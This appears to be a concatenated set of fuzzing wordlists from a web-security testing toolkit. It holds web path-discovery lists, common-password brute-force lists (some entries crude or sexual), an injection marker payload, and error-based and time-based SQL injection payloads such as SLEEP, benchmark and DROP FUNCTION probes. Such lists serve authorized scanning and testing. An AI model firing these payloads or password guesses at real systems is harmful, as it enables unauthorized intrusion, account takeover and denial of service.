 444 | /WebResource.axd
 445 | /Providers/
 446 | /rss
 447 | /editor/
 448 | /beta/
 449 | /tag
 450 | /docs/
 451 | /community/
 452 | /showgroups.php
 453 | /support/
 454 | /partner/
 455 | /facebook/
 456 | /click.php
 457 | /goto/
 458 | /shop/
 459 | /comment/
 460 | /blog/
 461 | /out/
 462 | /Scripts/
 463 | /phpcms
 464 | /groups/
 465 | /comment.php
 466 | /captcha/
 467 | /faq.php
 468 | /submit.php
 469 | /modcp/
 470 | /Documentation/
 471 | /link/
 472 | /error
 473 | /dyn/
 474 | /data
 475 | /classes/
 476 | /404.html
 477 | /feedback/
 478 | /packages/
 479 | /users
 480 | /preview/
 481 | /feed.php
 482 | /fb/channel.html
 483 | /author
 484 | /pages/
 485 | /gallery.php
 486 | /topusers.php
 487 | /respond.php
 488 | /reputation.php
 489 | /reports/
 490 | /receive.php
 491 | /joinrequests.php
 492 | /image.php
 493 | /e/update/
 494 | /affiche.php
 495 | /help
 496 | /e/enews/
 497 | /e/data/
 498 | /e/class/
 499 | /bin
 500 | /admincp/
 501 | /templates
 502 | /attachments/
 503 | /HttpModules/
 504 | /fonts/
 505 | /core/
 506 | /banner/
 507 | /stat/
 508 | /page/forward.php
 509 | /html/
 510 | /es/
 511 | /contest/
 512 | /swf/
 513 | /de/
 514 | /classifieds/
 515 | /forum/report.php
 516 | /wap/
 517 | /site/
 518 | /web/
 519 | /taxonomy/
 520 | /t/
 521 | /p/
 522 | /lang/
 523 | /service/
 524 | /cgi/
 525 | /search.html
 526 | /img
 527 | /ScriptResource.axd
 528 | /signup
 529 | /customavatars/
 530 | /ad/
 531 | /poll.php
 532 | /member
 533 | /info/
 534 | /forms/
 535 | /auth.php
 536 | /topic/
 537 | /page.php
 538 | /live.php
 539 | /usernote.php
 540 | /result/
 541 | /panel/
 542 | /l.php
 543 | /advancedsearch/
 544 | /result.php
 545 | /partners/
 546 | /new.php
 547 | /home
 548 | /forums/
 549 | /compare/
 550 | /module.php
 551 | /mediamainlog.php
 552 | /fcmedianet.js
 553 | /download.php
 554 | /cmedianet
 555 | /cmdynet
 556 | /cloud.php
 557 | /album.php
 558 | /scripts
 559 | /manage/
 560 | /live2.php
 561 | /groups.php
 562 | /forum/newreply.php
 563 | /w/
 564 | /private/
 565 | /inlinemod.php
 566 | /forum/login.php
 567 | /find/
 568 | /advancedsearch.php
 569 | /searchurl.php
 570 | /forum/private.php
 571 | /cs/
 572 | /auth
 573 | /resources/
 574 | /redirect
 575 | /new/web/
 576 | /javascript/
 577 | /forum/profile.php
 578 | /translation
 579 | /survey/
 580 | /go.php
 581 | /fr/
 582 | /forum/faq.php
 583 | /DesktopModules/
 584 | /404
 585 | /webservices/
 586 | /uebersetzung
 587 | /registration
 588 | /out
 589 | /calendar/
 590 | /analytics/
 591 | /redirect.php
 592 | /it/
 593 | /download
 594 | /config
 595 | /cars/
 596 | /user/profile/
 597 | /trips/
 598 | /lp/
 599 | /tracking
 600 | /src/
 601 | /payment/
 602 | /newattachment.php
 603 | /image/
 604 | /hotels/
 605 | /reg/
 606 | /forum/newthread.php
 607 | /forum/misc.php
 608 | /flights/
 609 | /engine/
 610 | /accounts/
 611 | /h/
 612 | /forum/register.php
 613 | /forum/printthread.php
 614 | /user/login
 615 | /tmp
 616 | /spamlog.log
 617 | /ns2.
 618 | /ns1.
 619 | /get.php
 620 | /events/
 621 | /promo/
 622 | /global.php
 623 | /forum/usercp.php
 624 | /upcoming/year/
 625 | /upcoming/week/
 626 | /upcoming/recent/
 627 | /upcoming/month/
 628 | /public/
 629 | /p.php
 630 | /db/
 631 | /book
 632 | /antispam.txt
 633 | /adm/
 634 | /Search/
 635 | /php/
 636 | /mobile
 637 | /e/
 638 | /x/
 639 | /upcoming/yesterday/
 640 | /upcoming/today/
 641 | /search.aspx
 642 | /links/
 643 | /library/
 644 | /email
 645 | /customprofilepics/
 646 | /cron/
 647 | /clientscript/
 648 | /application/
 649 | /Images/
 650 | /upcoming/alltime/
 651 | /myaccount/
 652 | /Account/
 653 | /widget/
 654 | /typo3/
 655 | /ru/
 656 | /manager/
 657 | /favorites/
 658 | /sharer/
 659 | /comments/feed
 660 | /browse/
 661 | /blocks/
 662 | /Templates/
 663 | /user/shaken/
 664 | /user/published/
 665 | /user/history/
 666 | /user/commented/
 667 | /themes
 668 | /product/
 669 | /labs
 670 | /k/
 671 | /index.html
 672 | /forum/online.php
 673 | /affiliates/
 674 | /user/voted/
 675 | /user/saved/
 676 | /private
 677 | /photo.php
 678 | /forum/member.php
 679 | /cpstyles/
 680 | /catalog/product/gallery/
 681 | /views/
 682 | /temp
 683 | /style/
 684 | /script/
 685 | /people/
 686 | /old/
 687 | /forum/sendmessage.php
 688 | /files
 689 | /adclick
 690 | /Resources/Widgets/
 691 | /track/
 692 | /json/
 693 | /bookings
 694 | /ads
 695 | /about/
 696 | /pl/
 697 | /photos.php
 698 | /landing/
 699 | /hotelreservation
 700 | /forum/editpost.php
 701 | /forum/calendar.php
 702 | /flightreservation
 703 | /clickthrough.jsp
 704 | /carreservation
 705 | /cache
 706 | /basket/
 707 | /Search
 708 | /updates/
 709 | /terms
 710 | /pub/
 711 | /avatars/
 712 | /account.php
 713 | /Resources/TabStrip/
 714 | /Resources/Dashboard/
 715 | /Resources/ControlPanel/
 716 | /Resources/ContentRotator/
 717 | /newsletter
 718 | /hashtag/
 719 | /documents/
 720 | /cp/
 721 | /checkpoint/
 722 | /ar/
 723 | /Resources/FeedBrowser/
 724 | /pg
 725 | /forum
 726 | /comment
 727 | /upload
 728 | /sd/
 729 | /popup/
 730 | /lite/
 731 | /forum/admin/
 732 | /export/
 733 | /database/
 734 | /empty.html
 735 | /cart.php
 736 | /share/
 737 | /settings/
 738 | /forums/search.php
 739 | /Portals/
 740 | /404.php
 741 | /showpost.php
 742 | /forums/memberlist.php
 743 | /f/
 744 | /attachment/
 745 | /pt/
 746 | /online/
 747 | /moira/
 748 | /messages/
 749 | /jobs/
 750 | /videos/
 751 | /nl/
 752 | /mail/termsandconditions
 753 | /forum/subscription.php
 754 | /forum/cron.php
 755 | /embed/
 756 | /sv/
 757 | /rd/
 758 | /forum/moderator.php
 759 | /chat/
 760 | /wp/
 761 | /typo3conf/
 762 | /login.html
 763 | /forum/images/
 764 | /favicon.ico
 765 | /errors
 766 | /ppl/
 767 | /order
 768 | /mail
 769 | /informer/
 770 | /forum/threadrate.php
 771 | /Resources/SkinWidgets/
 772 | /Resources/Search/
 773 | /utils/
 774 | /servlet/
 775 | /random
 776 | /otherContacts
 777 | /mt/
 778 | /fb/
 779 | /ext/
 780 | /endorsements
 781 | /class/
 782 | /cap/
 783 | /Resources/OpenForceAd/
 784 | /MMWIP/
 785 | /webstat/
 786 | /user/register
 787 | /static
 788 | /sitecore/
 789 | /lib
 790 | /forum/posting.php
 791 | /file/
 792 | /User/
 793 | /Resources/Shared/
 794 | /signup/
 795 | /products/
 796 | /press
 797 | /plus/
 798 | /osview/
 799 | /forums/login.php
 800 | /bbs/
 801 | /stats
 802 | /privacy
 803 | /mails/
 804 | /forums/report.php
 805 | /forum/postings.php
 806 | /workarea/
 807 | /t3lib/
 808 | /suche/
 809 | /post.php
 810 | /guides/
 811 | /forums/private.php
 812 | /forums/newreply.php
 813 | /doubleclick/
 814 | /support
 815 | /social/
 816 | /player/
 817 | /forums/newthread.php
 818 | /forum/attachment.php
 819 | /external/
 820 | /component/
 821 | /ws/
 822 | /tr/
 823 | /testing/
 824 | /reviews/
 825 | /newsletters/
 826 | /index/9
 827 | /index/7
 828 | /index/5
 829 | /hack/
 830 | /blog/tag/
 831 | /addineyeV2.html
 832 | /translations/
 833 | /sendtofriend.php
 834 | /mod/
 835 | /ipdata/
 836 | /index/8
 837 | /index/3
 838 | /index/1
 839 | /forums/usercp.php
 840 | /forums/printthread.php
 841 | /forums/calendar.php
 842 | /article/
 843 | /Registration
 844 | /user/password
 845 | /uk/
 846 | /skins/
 847 | /media
 848 | /l/
 849 | /forums/register.php
 850 | /forums/editpost.php
 851 | /forum/poll.php
 852 | /blogs/
 853 | /Resources/
 854 | /util/
 855 | /g/
 856 | /forums/subscription.php
 857 | /forums/sendmessage.php
 858 | /forum/showgroups.php
 859 | /directory/
 860 | /apc.php
 861 | /Bin/
 862 | /unsubscribe
 863 | /powerpoint
 864 | /posting.php
 865 | /photos/
 866 | /my
 867 | /hr/
 868 | /forums/misc.php
 869 | /doc/
 870 | /post/
 871 | /job/
 872 | /inc
 873 | /fi/
 874 | /feedback
 875 | /edit/
 876 | /browse/Video
 877 | /browse/Street
 878 | /browse/Still
 879 | /browse/Smug
 880 | /browse/Arts
 881 | /sitecore
 882 | /posts/
 883 | /page
 884 | /math/
 885 | /mambots/
 886 | /forums/profile.php
 887 | /forums/cron.php
 888 | /ct.html
 889 | /code/
 890 | /README.txt
 891 | /Controls/
 892 | /terms/
 893 | /subscriptions/
 894 | /subscribe/
 895 | /sponsored
 896 | /shopping/
 897 | /manage
 898 | /forums/online.php
 899 | /forum/reputation.php
 900 | /footer.php
 901 | /adv/
 902 | /unsubscribe/
 903 | /st.aspx
 904 | /rss.php
 905 | /oauth/
 906 | /members
 907 | /images/spacer.gif
 908 | /forums/threadrate.php
 909 | /forums/reputation.php
 910 | /forums/moderator.php
 911 | /e086ec.aspx
 912 | /ct/ct.aspx
 913 | /ct.aspx
 914 | /backend/
 915 | /articles/
 916 | /store/
 917 | /settings
 918 | /redir/
 919 | /popups/
 920 | /order.php
 921 | /login.aspx
 922 | /id/
 923 | /detail/
 924 | /cabinet/
 925 | /Ajax/
 926 | /tools
 927 | /rating/
 928 | /listing/
 929 | /javascripts/
 930 | /ja/
 931 | /e/config/
 932 | /cgi/scopus
 933 | /cgi/register
 934 | /cgi/login
 935 | /careerfocus/
 936 | /backtocs/
 937 | /adwatch
 938 | /uploads
 939 | /searchall
 940 | /misc/press/
 941 | /incoming/
 942 | /honeypot/
 943 | /go
 944 | /games/
 945 | /forums/poll.php
 946 | /forums/member.php
 947 | /forum/joinrequests.php
 948 | /dashboard/
 949 | /citmgr
 950 | /citemap
 951 | /cgi/topics
 952 | /cgi/searchresults
 953 | /cgi/searchhistory
 954 | /cgi/search
 955 | /cgi/savedsearch
 956 | /cgi/reprintsidebar
 957 | /cgi/powerpoint
 958 | /cgi/myjs
 959 | /cgi/markedcitation
 960 | /cgi/mailafriend
 961 | /cgi/folders
 962 | /cgi/flagsearch
 963 | /cgi/etoc
 964 | /cgi/ctmain
 965 | /cgi/ctalert
 966 | /cgi/cookietest
 967 | /cgi/citmgr
 968 | /cgi/citemap
 969 | /cgi/changeuserinfo
 970 | /cgi/authordata
 971 | /cgi/alerts
 972 | /cgi/adclick
 973 | /category
 974 | /announcement.php
 975 | /adsystem
 976 | /adm
 977 | /accesslogs
 978 | /tags
 979 | /interactive/
 980 | /hooks/
 981 | /forums/showgroups.php
 982 | /bg/
 983 | /basket
 984 | /aw
 985 | /assets
 986 | /advertising/
 987 | /action/
 988 | /wiki/
 989 | /traffic/
 990 | /modcp.php
 991 | /index.php/cod.orders/
 992 | /index.php/cod.filters/
 993 | /forums/postings.php
 994 | /forums/joinrequests.php
 995 | /design/
 996 | /demo
 997 | /day
 998 | /affiliate/
 999 | /1/
1000 | /ugc/
1001 | 


--------------------------------------------------------------------------------
/FuzzLists/grep_injectx.txt:
--------------------------------------------------------------------------------
1 | INJECTX
2 | </INJECT>
3 | (INJECTX)
4 | 


--------------------------------------------------------------------------------
/FuzzLists/passwords_medium.txt:
--------------------------------------------------------------------------------
  1 | 123456
  2 | password
  3 | 12345678
  4 | 1234
  5 | pussy
  6 | 12345
  7 | dragon
  8 | qwerty
  9 | 696969
 10 | mustang
 11 | letmein
 12 | baseball
 13 | master
 14 | michael
 15 | football
 16 | shadow
 17 | monkey
 18 | abc123
 19 | pass
 20 | fuckme
 21 | 6969
 22 | jordan
 23 | harley
 24 | ranger
 25 | iwantu
 26 | jennifer
 27 | hunter
 28 | fuck
 29 | 2000
 30 | test
 31 | batman
 32 | trustno1
 33 | thomas
 34 | tigger
 35 | robert
 36 | access
 37 | love
 38 | buster
 39 | 1234567
 40 | soccer
 41 | hockey
 42 | killer
 43 | george
 44 | sexy
 45 | andrew
 46 | charlie
 47 | superman
 48 | asshole
 49 | fuckyou
 50 | dallas
 51 | jessica
 52 | panties
 53 | pepper
 54 | 1111
 55 | austin
 56 | william
 57 | daniel
 58 | golfer
 59 | summer
 60 | heather
 61 | hammer
 62 | yankees
 63 | joshua
 64 | maggie
 65 | biteme
 66 | enter
 67 | ashley
 68 | thunder
 69 | cowboy
 70 | silver
 71 | richard
 72 | fucker
 73 | orange
 74 | merlin
 75 | michelle
 76 | corvette
 77 | bigdog
 78 | cheese
 79 | matthew
 80 | 121212
 81 | patrick
 82 | martin
 83 | freedom
 84 | ginger
 85 | blowjob
 86 | nicole
 87 | sparky
 88 | yellow
 89 | camaro
 90 | secret
 91 | dick
 92 | falcon
 93 | taylor
 94 | 111111
 95 | 131313
 96 | 123123
 97 | bitch
 98 | hello
 99 | scooter
100 | please
101 | porsche
102 | guitar
103 | chelsea
104 | black
105 | diamond
106 | nascar
107 | jackson
108 | cameron
109 | 654321
110 | computer
111 | amanda
112 | wizard
113 | xxxxxxxx
114 | money
115 | phoenix
116 | mickey
117 | bailey
118 | knight
119 | iceman
120 | tigers
121 | purple
122 | andrea
123 | horny
124 | dakota
125 | aaaaaa
126 | player
127 | sunshine
128 | morgan
129 | starwars
130 | boomer
131 | cowboys
132 | edward
133 | charles
134 | girls
135 | booboo
136 | coffee
137 | xxxxxx
138 | bulldog
139 | ncc1701
140 | rabbit
141 | peanut
142 | john
143 | johnny
144 | gandalf
145 | spanky
146 | winter
147 | brandy
148 | compaq
149 | carlos
150 | tennis
151 | james
152 | mike
153 | brandon
154 | fender
155 | anthony
156 | blowme
157 | ferrari
158 | cookie
159 | chicken
160 | maverick
161 | chicago
162 | joseph
163 | diablo
164 | sexsex
165 | hardcore
166 | 666666
167 | willie
168 | welcome
169 | chris
170 | panther
171 | yamaha
172 | justin
173 | banana
174 | driver
175 | marine
176 | angels
177 | fishing
178 | david
179 | maddog
180 | hooters
181 | wilson
182 | butthead
183 | dennis
184 | fucking
185 | captain
186 | bigdick
187 | chester
188 | smokey
189 | xavier
190 | steven
191 | viking
192 | snoopy
193 | blue
194 | eagles
195 | winner
196 | samantha
197 | house
198 | miller
199 | flower
200 | jack
201 | firebird
202 | butter
203 | united
204 | turtle
205 | steelers
206 | tiffany
207 | zxcvbn
208 | tomcat
209 | golf
210 | bond007
211 | bear
212 | tiger
213 | doctor
214 | gateway
215 | gators
216 | angel
217 | junior
218 | thx1138
219 | porno
220 | badboy
221 | debbie
222 | spider
223 | melissa
224 | booger
225 | 1212
226 | flyers
227 | fish
228 | porn
229 | matrix
230 | teens
231 | scooby
232 | jason
233 | walter
234 | cumshot
235 | boston
236 | braves
237 | yankee
238 | lover
239 | barney
240 | victor
241 | tucker
242 | princess
243 | mercedes
244 | 5150
245 | doggie
246 | zzzzzz
247 | gunner
248 | horney
249 | bubba
250 | 2112
251 | fred
252 | johnson
253 | xxxxx
254 | tits
255 | member
256 | boobs
257 | donald
258 | bigdaddy
259 | bronco
260 | penis
261 | voyager
262 | rangers
263 | birdie
264 | trouble
265 | white
266 | topgun
267 | bigtits
268 | bitches
269 | green
270 | super
271 | qazwsx
272 | magic
273 | lakers
274 | rachel
275 | slayer
276 | scott
277 | 2222
278 | asdf
279 | video
280 | london
281 | 7777
282 | marlboro
283 | srinivas
284 | internet
285 | action
286 | carter
287 | jasper
288 | monster
289 | teresa
290 | jeremy
291 | 11111111
292 | bill
293 | crystal
294 | peter
295 | pussies
296 | cock
297 | beer
298 | rocket
299 | theman
300 | oliver
301 | prince
302 | beach
303 | amateur
304 | 7777777
305 | muffin
306 | redsox
307 | star
308 | testing
309 | shannon
310 | murphy
311 | frank
312 | hannah
313 | dave
314 | eagle1
315 | 11111
316 | mother
317 | nathan
318 | raiders
319 | steve
320 | forever
321 | angela
322 | viper
323 | ou812
324 | jake
325 | lovers
326 | suckit
327 | gregory
328 | buddy
329 | whatever
330 | young
331 | nicholas
332 | lucky
333 | helpme
334 | jackie
335 | monica
336 | midnight
337 | college
338 | baby
339 | cunt
340 | brian
341 | mark
342 | startrek
343 | sierra
344 | leather
345 | 232323
346 | 4444
347 | beavis
348 | bigcock
349 | happy
350 | sophie
351 | ladies
352 | naughty
353 | giants
354 | booty
355 | blonde
356 | fucked
357 | golden
358 | 0
359 | fire
360 | sandra
361 | pookie
362 | packers
363 | einstein
364 | dolphins
365 | 0
366 | chevy
367 | winston
368 | warrior
369 | sammy
370 | slut
371 | 8675309
372 | zxcvbnm
373 | nipples
374 | power
375 | victoria
376 | asdfgh
377 | vagina
378 | toyota
379 | travis
380 | hotdog
381 | paris
382 | rock
383 | xxxx
384 | extreme
385 | redskins
386 | erotic
387 | dirty
388 | ford
389 | freddy
390 | arsenal
391 | access14
392 | wolf
393 | nipple
394 | iloveyou
395 | alex
396 | florida
397 | eric
398 | legend
399 | movie
400 | success
401 | rosebud
402 | jaguar
403 | great
404 | cool
405 | cooper
406 | 1313
407 | scorpio
408 | mountain
409 | madison
410 | 987654
411 | brazil
412 | lauren
413 | japan
414 | naked
415 | squirt
416 | stars
417 | apple
418 | alexis
419 | aaaa
420 | bonnie
421 | peaches
422 | jasmine
423 | kevin
424 | matt
425 | qwertyui
426 | danielle
427 | beaver
428 | 4321
429 | 4128
430 | runner
431 | swimming
432 | dolphin
433 | gordon
434 | casper
435 | stupid
436 | shit
437 | saturn
438 | gemini
439 | apples
440 | august
441 | 3333
442 | canada
443 | blazer
444 | cumming
445 | hunting
446 | kitty
447 | rainbow
448 | 112233
449 | arthur
450 | cream
451 | calvin
452 | shaved
453 | surfer
454 | samson
455 | kelly
456 | paul
457 | mine
458 | king
459 | racing
460 | 5555
461 | eagle
462 | hentai
463 | newyork
464 | little
465 | redwings
466 | smith
467 | sticky
468 | cocacola
469 | animal
470 | broncos
471 | private
472 | skippy
473 | marvin
474 | blondes
475 | enjoy
476 | girl
477 | apollo
478 | parker
479 | qwert
480 | time
481 | sydney
482 | women
483 | voodoo
484 | magnum
485 | juice
486 | abgrtyu
487 | 777777
488 | dreams
489 | maxwell
490 | music
491 | rush2112
492 | russia
493 | scorpion
494 | rebecca
495 | tester
496 | mistress
497 | phantom
498 | billy
499 | 6666
500 | albert
501 | 


--------------------------------------------------------------------------------
/FuzzLists/passwords_quick.txt:
--------------------------------------------------------------------------------
 1 | 123456
 2 | password
 3 | 12345678
 4 | qwerty
 5 | abc123
 6 | 123456789
 7 | 111111
 8 | 1234567
 9 | iloveyou
10 | adobe123
11 | 123123
12 | admin
13 | 1234567890
14 | letmein
15 | photoshop
16 | 1234
17 | monkey
18 | shadow
19 | sunshine
20 | 12345
21 | password1
22 | princess
23 | azerty
24 | trustno1
25 | 000000
26 | 1dc13d
27 | admin
28 | 123123
29 | admin1
30 | admins
31 | 123456
32 | 12345678
33 | 7777777
34 | letmein
35 | 121212
36 | qweqwe
37 | iloveyou
38 | administrator
39 | holysh!t
40 | 55555
41 | 1q2w3e
42 | qwerty
43 | wordpress
44 | wpsite
45 | internet
46 | asdfghjkl
47 | 121314
48 | lollipop
49 | killer
50 | pass
51 | lovers
52 | hello
53 | dragon
54 | admin123
55 | office
56 | jerome
57 | fyfcnfcbz
58 | 


--------------------------------------------------------------------------------
/FuzzLists/payload_injectx.txt:
--------------------------------------------------------------------------------
1 | INJECTX
2 | INJECTX'"></INJECT>(INJECTX)
3 | INJECTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'"></INJECTX>(INJECTX)
4 | 


--------------------------------------------------------------------------------
/FuzzLists/sqli-error-based.txt:
--------------------------------------------------------------------------------
  1 |  OR 1=1
  2 |  OR 1=0
  3 |  OR x=x
  4 |  OR x=y
  5 |  OR 1=1#
  6 |  OR 1=0#
  7 |  OR x=x#
  8 |  OR x=y#
  9 |  OR 1=1-- 
 10 |  OR 1=0-- 
 11 |  OR x=x-- 
 12 |  OR x=y-- 
 13 |  OR 3409=3409 AND ('pytW' LIKE 'pytW
 14 |  OR 3409=3409 AND ('pytW' LIKE 'pytY
 15 |  HAVING 1=1
 16 |  HAVING 1=0
 17 |  HAVING 1=1#
 18 |  HAVING 1=0#
 19 |  HAVING 1=1-- 
 20 |  HAVING 1=0-- 
 21 |  AND 1=1
 22 |  AND 1=0
 23 |  AND 1=1-- 
 24 |  AND 1=0-- 
 25 |  AND 1=1#
 26 |  AND 1=0#
 27 |  AND 1=1 AND '%'='
 28 |  AND 1=0 AND '%'='
 29 |  AND 1083=1083 AND (1427=1427
 30 |  AND 7506=9091 AND (5913=5913
 31 |  AND 1083=1083 AND ('1427=1427
 32 |  AND 7506=9091 AND ('5913=5913
 33 |  AND 7300=7300 AND 'pKlZ'='pKlZ
 34 |  AND 7300=7300 AND 'pKlZ'='pKlY
 35 |  AND 7300=7300 AND ('pKlZ'='pKlZ
 36 |  AND 7300=7300 AND ('pKlZ'='pKlY
 37 |  AS INJECTX WHERE 1=1 AND 1=1
 38 |  AS INJECTX WHERE 1=1 AND 1=0
 39 |  AS INJECTX WHERE 1=1 AND 1=1#
 40 |  AS INJECTX WHERE 1=1 AND 1=0#
 41 |  AS INJECTX WHERE 1=1 AND 1=1--
 42 |  AS INJECTX WHERE 1=1 AND 1=0--
 43 |  WHERE 1=1 AND 1=1
 44 |  WHERE 1=1 AND 1=0
 45 |  WHERE 1=1 AND 1=1#
 46 |  WHERE 1=1 AND 1=0#
 47 |  WHERE 1=1 AND 1=1--
 48 |  WHERE 1=1 AND 1=0--
 49 |  ORDER BY 1-- 
 50 |  ORDER BY 2-- 
 51 |  ORDER BY 3-- 
 52 |  ORDER BY 4-- 
 53 |  ORDER BY 5-- 
 54 |  ORDER BY 6-- 
 55 |  ORDER BY 7-- 
 56 |  ORDER BY 8-- 
 57 |  ORDER BY 9-- 
 58 |  ORDER BY 10-- 
 59 |  ORDER BY 11-- 
 60 |  ORDER BY 12-- 
 61 |  ORDER BY 13-- 
 62 |  ORDER BY 14-- 
 63 |  ORDER BY 15-- 
 64 |  ORDER BY 16-- 
 65 |  ORDER BY 17-- 
 66 |  ORDER BY 18-- 
 67 |  ORDER BY 19-- 
 68 |  ORDER BY 20-- 
 69 |  ORDER BY 21-- 
 70 |  ORDER BY 22-- 
 71 |  ORDER BY 23-- 
 72 |  ORDER BY 24-- 
 73 |  ORDER BY 25-- 
 74 |  ORDER BY 26-- 
 75 |  ORDER BY 27-- 
 76 |  ORDER BY 28-- 
 77 |  ORDER BY 29-- 
 78 |  ORDER BY 30-- 
 79 |  ORDER BY 31337-- 
 80 |  ORDER BY 1# 
 81 |  ORDER BY 2# 
 82 |  ORDER BY 3# 
 83 |  ORDER BY 4# 
 84 |  ORDER BY 5# 
 85 |  ORDER BY 6# 
 86 |  ORDER BY 7# 
 87 |  ORDER BY 8# 
 88 |  ORDER BY 9# 
 89 |  ORDER BY 10# 
 90 |  ORDER BY 11# 
 91 |  ORDER BY 12# 
 92 |  ORDER BY 13# 
 93 |  ORDER BY 14# 
 94 |  ORDER BY 15# 
 95 |  ORDER BY 16# 
 96 |  ORDER BY 17# 
 97 |  ORDER BY 18# 
 98 |  ORDER BY 19# 
 99 |  ORDER BY 20# 
100 |  ORDER BY 21# 
101 |  ORDER BY 22# 
102 |  ORDER BY 23# 
103 |  ORDER BY 24# 
104 |  ORDER BY 25# 
105 |  ORDER BY 26# 
106 |  ORDER BY 27# 
107 |  ORDER BY 28# 
108 |  ORDER BY 29# 
109 |  ORDER BY 30#
110 |  ORDER BY 31337#
111 |  ORDER BY 1 
112 |  ORDER BY 2 
113 |  ORDER BY 3 
114 |  ORDER BY 4 
115 |  ORDER BY 5 
116 |  ORDER BY 6 
117 |  ORDER BY 7 
118 |  ORDER BY 8 
119 |  ORDER BY 9 
120 |  ORDER BY 10 
121 |  ORDER BY 11 
122 |  ORDER BY 12 
123 |  ORDER BY 13 
124 |  ORDER BY 14 
125 |  ORDER BY 15 
126 |  ORDER BY 16 
127 |  ORDER BY 17 
128 |  ORDER BY 18 
129 |  ORDER BY 19 
130 |  ORDER BY 20 
131 |  ORDER BY 21 
132 |  ORDER BY 22 
133 |  ORDER BY 23 
134 |  ORDER BY 24 
135 |  ORDER BY 25 
136 |  ORDER BY 26 
137 |  ORDER BY 27 
138 |  ORDER BY 28 
139 |  ORDER BY 29 
140 |  ORDER BY 30 
141 |  ORDER BY 31337 
142 |  RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
143 |  RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='
144 | IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--
145 | IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--
146 | %' AND 8310=8310 AND '%'='
147 | %' AND 8310=8311 AND '%'='
148 |  and (select substring(@@version,1,1))='X'
149 |  and (select substring(@@version,1,1))='M'
150 |  and (select substring(@@version,2,1))='i'
151 |  and (select substring(@@version,2,1))='y'
152 |  and (select substring(@@version,3,1))='c'
153 |  and (select substring(@@version,3,1))='S'
154 |  and (select substring(@@version,3,1))='X'
155 | 


--------------------------------------------------------------------------------
/FuzzLists/sqli-time-based.txt:
--------------------------------------------------------------------------------
 1 |  AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
 2 |  AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
 3 |  AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
 4 |  AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
 5 |  AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
 6 | SLEEP(5)#
 7 | SLEEP(5)-- 
 8 | SLEEP(5)="
 9 | SLEEP(5)='
10 |  or SLEEP(5)
11 |  or SLEEP(5)#
12 |  or SLEEP(5)--
13 |  or SLEEP(5)="
14 |  or SLEEP(5)='
15 | waitfor delay '00:00:05'
16 | waitfor delay '00:00:05'-- 
17 | waitfor delay '00:00:05'#
18 | benchmark(50000000,MD5(1))
19 | benchmark(50000000,MD5(1))-- 
20 | benchmark(50000000,MD5(1))#
21 |  or benchmark(50000000,MD5(1))
22 |  or benchmark(50000000,MD5(1))-- 
23 |  or benchmark(50000000,MD5(1))#
24 | pg_SLEEP(5)
25 | pg_SLEEP(5)-- 
26 | pg_SLEEP(5)#
27 |  or pg_SLEEP(5)
28 |  or pg_SLEEP(5)-- 
29 |  or pg_SLEEP(5)#
30 | '\"
31 |  AnD SLEEP(5)
32 |  AnD SLEEP(5)--
33 |  AnD SLEEP(5)#
34 | &&SLEEP(5)
35 | &&SLEEP(5)--
36 | &&SLEEP(5)#
37 | ' AnD SLEEP(5) ANd '1
38 | '&&SLEEP(5)&&'1
39 |  ORDER BY SLEEP(5)
40 |  ORDER BY SLEEP(5)-- 
41 |  ORDER BY SLEEP(5)#
42 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)
43 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
44 | (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
45 | +benchmark(3200,SHA1(1))+'
46 |  + SLEEP(10) + '
47 |  RANDOMBLOB(500000000/2)
48 |  AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
49 |  OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
50 |  RANDOMBLOB(1000000000/2)
51 |  AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
